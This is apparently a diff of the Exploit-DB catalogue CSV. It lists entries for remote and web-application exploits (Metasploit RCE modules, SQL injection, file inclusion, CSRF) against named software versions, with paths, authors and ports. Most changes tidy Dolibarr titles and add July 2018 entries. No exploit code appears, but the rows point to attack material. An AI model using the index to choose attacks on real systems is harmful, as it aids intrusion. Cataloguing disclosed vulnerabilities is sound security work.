@ -16608,11 +16610,15 @@ id,file,description,date,author,type,platform,port
44985,exploits/windows/remote/44985.c,"PolarisOffice 2017 8 - Remote Code Execution",2018-07-06,hyp3rlinx,remote,windows,
44987,exploits/windows/remote/44987.txt,"Activision Infinity Ward Call of Duty Modern Warfare 2 - Buffer Overflow",2018-07-09,"Maurice Heumann",remote,windows,
44991,exploits/linux/remote/44991.rb,"HP VAN SDN Controller - Root Command Injection (Metasploit)",2018-07-09,Metasploit,remote,linux,8081
44992,exploits/linux/remote/44992.rb,"HID discoveryd - 'command_blink_on' Unauthenticated Remote Code Execution (Metasploit)",2018-07-09,Metasploit,remote,linux,4070
44992,exploits/linux/remote/44992.rb,"HID discoveryd - 'command_blink_on' Remote Code Execution (Metasploit)",2018-07-09,Metasploit,remote,linux,4070
44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php,
45000,exploits/linux_x86-64/remote/45000.c,"OpenSSH < 6.6 SFTP (x64) - Command Execution",2014-10-08,"Jann Horn",remote,linux_x86-64,
45001,exploits/linux/remote/45001.py,"OpenSSH < 6.6 SFTP - Command Execution",2018-03-20,SECFORCE,remote,linux,
45005,exploits/unix/remote/45005.rb,"IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit)",2018-07-11,Metasploit,remote,unix,443
45005,exploits/unix/remote/45005.rb,"IBM QRadar SIEM - Remote Code Execution (Metasploit)",2018-07-11,Metasploit,remote,unix,443
45018,exploits/java/remote/45018.rb,"Manage Engine Exchange Reporter Plus - Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,java,8181
45019,exploits/linux/remote/45019.rb,"Apache CouchDB - Arbitrary Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,5984
45020,exploits/php/remote/45020.rb,"phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,php,80
45025,exploits/linux/remote/45025.rb,"Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,8088
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -26049,7 +26055,7 @@ id,file,description,date,author,type,platform,port
18468,exploits/php/webapps/18468.html,"Flyspray 0.9.9.6 - Cross-Site Request Forgery",2012-02-07,"Vaibhav Gupta",webapps,php,
18470,exploits/php/webapps/18470.txt,"Gazelle CMS 1.0 - Update Statement SQL Injection",2012-02-08,hackme,webapps,php,
18473,exploits/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - Remote File Inclusion",2012-02-08,Vulnerability-Lab,webapps,multiple,
18480,exploits/php/webapps/18480.txt,"Dolibarr 3.2.0 < Alpha - File Inclusion",2012-02-10,Vulnerability-Lab,webapps,php,
18480,exploits/php/webapps/18480.txt,"Dolibarr ERP/CRM 3.2.0 < Alpha - File Inclusion",2012-02-10,Vulnerability-Lab,webapps,php,
18483,exploits/php/webapps/18483.txt,"Fork CMS 3.2.4 - Local File Inclusion / Cross-Site Scripting",2012-02-12,"Avram Marius",webapps,php,
18499,exploits/hardware/webapps/18499.txt,"D-Link DSL-2640B ADSL Router - Cross-Site Request Forgery",2012-02-20,"Ivano Binetti",webapps,hardware,
18487,exploits/php/webapps/18487.html,"SocialCMS 1.0.2 - Cross-Site Request Forgery",2012-02-16,"Ivano Binetti",webapps,php,
@ -26149,7 +26155,7 @@ id,file,description,date,author,type,platform,port
18720,exploits/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery (Add Admin)",2012-04-08,Dr.NaNo,webapps,php,
18722,exploits/cgi/webapps/18722.txt,"ZTE - Change Admin Password",2012-04-08,"Nuevo Asesino",webapps,cgi,
18724,exploits/php/webapps/18724.rb,"Dolibarr ERP/CRM 3 - (Authenticated) OS Command Injection (Metasploit)",2012-04-09,Metasploit,webapps,php,
18725,exploits/php/webapps/18725.txt,"Dolibarr ERP/CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",webapps,php,
18725,exploits/php/webapps/18725.txt,"Dolibarr ERP/CRM < 3.2.0 / < 3.1.1 - OS Command Injection",2012-04-09,"Nahuel Grisolia",webapps,php,
18728,exploits/php/webapps/18728.txt,"Joomla! Component Estate Agent - SQL Injection",2012-04-10,xDarkSton3x,webapps,php,
18729,exploits/php/webapps/18729.txt,"Joomla! Component com_bearleague - SQL Injection",2012-04-10,xDarkSton3x,webapps,php,
18732,exploits/php/webapps/18732.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection (2)",2012-04-12,"hordcode security",webapps,php,
@ -30956,7 +30962,7 @@ id,file,description,date,author,type,platform,port
28965,exploits/php/webapps/28965.txt,"Bitweaver 1.x - '/wiki/list_pages.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",webapps,php,
28967,exploits/php/webapps/28967.txt,"ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion",2006-11-11,Firewall1954,webapps,php,
28970,exploits/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - (Authenticated) Persistent Cross-Site Scripting",2013-10-15,TheXero,webapps,php,80
28971,exploits/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php?sondage' SQL Injection",2013-10-15,drone,webapps,php,80
28971,exploits/php/webapps/28971.py,"Dolibarr ERP/CRM 3.4.0 - 'exportcsv.php?sondage' SQL Injection",2013-10-15,drone,webapps,php,80
28972,exploits/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",webapps,unix,
28975,exploits/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,webapps,ios,
28976,exploits/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - Local File Inclusion",2013-10-15,Vulnerability-Lab,webapps,ios,
@ -34015,7 +34021,7 @@ id,file,description,date,author,type,platform,port
34004,exploits/php/webapps/34004.txt,"Joomla! Component Percha Fields Attach 1.0 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
34005,exploits/php/webapps/34005.txt,"Joomla! Component Percha Downloads Attach 1.1 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
34006,exploits/php/webapps/34006.txt,"Joomla! Component Percha Gallery 1.6 Beta - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
34007,exploits/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Vulnerabilities",2014-07-08,"Deepak Rathore",webapps,php,
34007,exploits/php/webapps/34007.txt,"Dolibarr ERP/CRM 3.5.3 - Multiple Vulnerabilities",2014-07-08,"Deepak Rathore",webapps,php,
34008,exploits/php/webapps/34008.txt,"Joomla! Component Percha Multicategory Article 0.6 - 'Controller' Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
34011,exploits/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP - 'search.php' Cross-Site Scripting",2010-05-19,"Andrea Bocchetti",webapps,php,
34012,exploits/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 - '/resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabilities",2010-05-19,xuanmumu,webapps,php,
@ -35052,7 +35058,7 @@ id,file,description,date,author,type,platform,port
35648,exploits/php/webapps/35648.txt,"ZenPhoto 1.4.0.3 - '_zp_themeroot' Multiple Cross-Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",webapps,php,
35649,exploits/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php,
35650,exploits/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie SQL Injection",2011-04-21,"AutoSec Tools",webapps,php,
35651,exploits/php/webapps/35651.txt,"Dolibarr CMS 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php,
35651,exploits/php/webapps/35651.txt,"Dolibarr ERP/CRM 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php,
35657,exploits/php/webapps/35657.php,"WordPress Plugin Sermon Browser 0.43 - Cross-Site Scripting / SQL Injection",2011-04-26,Ma3sTr0-Dz,webapps,php,
35655,exploits/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Cross-Site Scripting",2011-04-25,"AutoSec Tools",webapps,php,
35662,exploits/php/webapps/35662.txt,"Noah's Classifieds 5.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-26,"High-Tech Bridge SA",webapps,php,
@ -35476,9 +35482,9 @@ id,file,description,date,author,type,platform,port
36328,exploits/php/webapps/36328.txt,"TA.CMS (TeachArabia) - 'index.php?id' SQL Injection",2011-11-22,CoBRa_21,webapps,php,
36329,exploits/php/webapps/36329.txt,"TA.CMS (TeachArabia) - 'lang' Traversal Local File Inclusion",2011-11-22,CoBRa_21,webapps,php,
36330,exploits/php/webapps/36330.txt,"Dolibarr ERP/CRM 3.1 - Multiple Script URI Cross-Site Scripting Vulnerabilities",2011-11-23,"High-Tech Bridge SA",webapps,php,
36331,exploits/php/webapps/36331.txt,"Dolibarr ERP/CRM - '/user/index.php' Multiple SQL Injections",2011-11-23,"High-Tech Bridge SA",webapps,php,
36332,exploits/php/webapps/36332.txt,"Dolibarr ERP/CRM - '/user/info.php?id' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
36333,exploits/php/webapps/36333.txt,"Dolibarr ERP/CRM - '/admin/boxes.php?rowid' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
36331,exploits/php/webapps/36331.txt,"Dolibarr ERP/CRM 3.1.0 - '/user/index.php' Multiple SQL Injections",2011-11-23,"High-Tech Bridge SA",webapps,php,
36332,exploits/php/webapps/36332.txt,"Dolibarr ERP/CRM 3.1.0 - '/user/info.php?id' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
36333,exploits/php/webapps/36333.txt,"Dolibarr ERP/CRM 3.1.0 - '/admin/boxes.php?rowid' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
36338,exploits/php/webapps/36338.txt,"WordPress Plugin ClickDesk Live Support 2.0 - 'cdwidget' Cross-Site Scripting",2011-11-23,Amir,webapps,php,
36339,exploits/php/webapps/36339.txt,"WordPress Plugin Featurific For WordPress 1.6.2 - 'snum' Cross-Site Scripting",2011-11-23,Amir,webapps,php,
36340,exploits/php/webapps/36340.txt,"WordPress Plugin NewsLetter Meenews 5.1 - 'idnews' Cross-Site Scripting",2011-11-23,Amir,webapps,php,
@ -35715,7 +35721,7 @@ id,file,description,date,author,type,platform,port
36676,exploits/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,webapps,php,80
36677,exploits/php/webapps/36677.txt,"WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",webapps,php,80
36678,exploits/jsp/webapps/36678.txt,"Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",webapps,jsp,
36683,exploits/php/webapps/36683.txt,"Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",webapps,php,
36683,exploits/php/webapps/36683.txt,"Dolibarr ERP/CRM 3.x - '/adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",webapps,php,
36684,exploits/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,webapps,java,
36685,exploits/php/webapps/36685.txt,"CubeCart 3.0.20 - Multiple Script 'redir' Arbitrary Site Redirects",2012-02-10,"Aung Khant",webapps,php,
36686,exploits/php/webapps/36686.txt,"CubeCart 3.0.20 - '/admin/login.php?goto' Arbitrary Site Redirect",2012-02-10,"Aung Khant",webapps,php,
@ -35831,7 +35837,7 @@ id,file,description,date,author,type,platform,port
36865,exploits/hardware/webapps/36865.txt,"Xavi 7968 ADSL Router - '/webconfig/lan/lan_config.html/local_lan_config?host_name_txtbox' Cross-Site Scripting",2012-02-21,Busindre,webapps,hardware,
36867,exploits/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,webapps,php,
36870,exploits/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting",2012-02-22,"Stefan Schurtz",webapps,php,
36873,exploits/php/webapps/36873.txt,"Dolibarr CMS 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",webapps,php,
36873,exploits/php/webapps/36873.txt,"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",webapps,php,
36874,exploits/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",webapps,php,
36875,exploits/php/webapps/36875.txt,"Chyrp 2.1.2 - '/includes/error.php?body' Cross-Site Scripting",2012-02-22,"High-Tech Bridge SA",webapps,php,
36876,exploits/php/webapps/36876.txt,"Oxwall 1.1.1 - 'plugin' Cross-Site Scripting",2012-02-22,Ariko-Security,webapps,php,
@ -39554,7 +39560,7 @@ id,file,description,date,author,type,platform,port
44801,exploits/java/webapps/44801.txt,"SearchBlox 8.6.6 - Cross-Site Request Forgery",2018-05-30,"Ahmet Gurel",webapps,java,
44803,exploits/macos/webapps/44803.txt,"Yosoro 1.0.4 - Remote Code Execution",2018-05-30,"Carlo Pelliccioni",webapps,macos,
44804,exploits/php/webapps/44804.txt,"MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass",2018-05-30,"Amine Taouirsa",webapps,php,80
44805,exploits/php/webapps/44805.txt,"Dolibarr 7.0.0 - SQL Injection",2018-05-30,Sysdream,webapps,php,80
44805,exploits/php/webapps/44805.txt,"Dolibarr ERP/CRM 7.0.0 - (Authenticated) SQL Injection",2018-05-30,Sysdream,webapps,php,80
44809,exploits/hardware/webapps/44809.txt,"TAC Xenta 511/911 - Directory Traversal",2018-05-31,"Marek Cybul",webapps,hardware,
44813,exploits/php/webapps/44813.txt,"New STAR 2.1 - SQL Injection / Cross-Site Scripting",2018-05-31,"Kağan Çapar",webapps,php,
44814,exploits/php/webapps/44814.txt,"PHP Dashboards NEW 5.5 - 'email' SQL Injection",2018-05-31,"Kağan Çapar",webapps,php,
@ -39634,12 +39640,13 @@ id,file,description,date,author,type,platform,port
44957,exploits/hardware/webapps/44957.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)",2018-07-02,RandoriSec,webapps,hardware,80
44959,exploits/hardware/webapps/44959.py,"VMware NSX SD-WAN Edge < 3.1.2 - Command Injection",2018-07-02,ParagonSec,webapps,hardware,
44960,exploits/php/webapps/44960.html,"DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)",2018-07-02,bay0net,webapps,php,80
44964,exploits/php/webapps/44964.txt,"Dolibarr ERP CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
44964,exploits/php/webapps/44964.txt,"Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua,
44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,
44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,8181
44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php,
44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php,
44978,exploits/php/webapps/44978.txt,"ShopNx - Arbitrary File Upload",2018-07-04,L0RD,webapps,php,
45014,exploits/php/webapps/45014.txt,"WAGO e!DISPLAY 7300T - Multiple Vulnerabilities",2018-07-13,"SEC Consult",webapps,php,80
44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80
44986,exploits/windows/webapps/44986.txt,"Airties AIR5444TT - Cross-Site Scripting",2018-07-06,"Raif Berkay Dincel",webapps,windows,80
44988,exploits/php/webapps/44988.txt,"Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting",2018-07-09,"Ahmed Elhady Mohamed",webapps,php,
@ -39650,3 +39657,6 @@ id,file,description,date,author,type,platform,port
45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,
45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php,
45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,
45015,exploits/hardware/webapps/45015.txt,"QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities",2018-07-13,"Core Security",webapps,hardware,443
45016,exploits/php/webapps/45016.txt,"Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure",2018-07-13,"SEC Consult",webapps,php,80
45022,exploits/hardware/webapps/45022.txt,"Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery",2018-07-13,t4rkd3vilz,webapps,hardware,

Can't render this file because it is too large.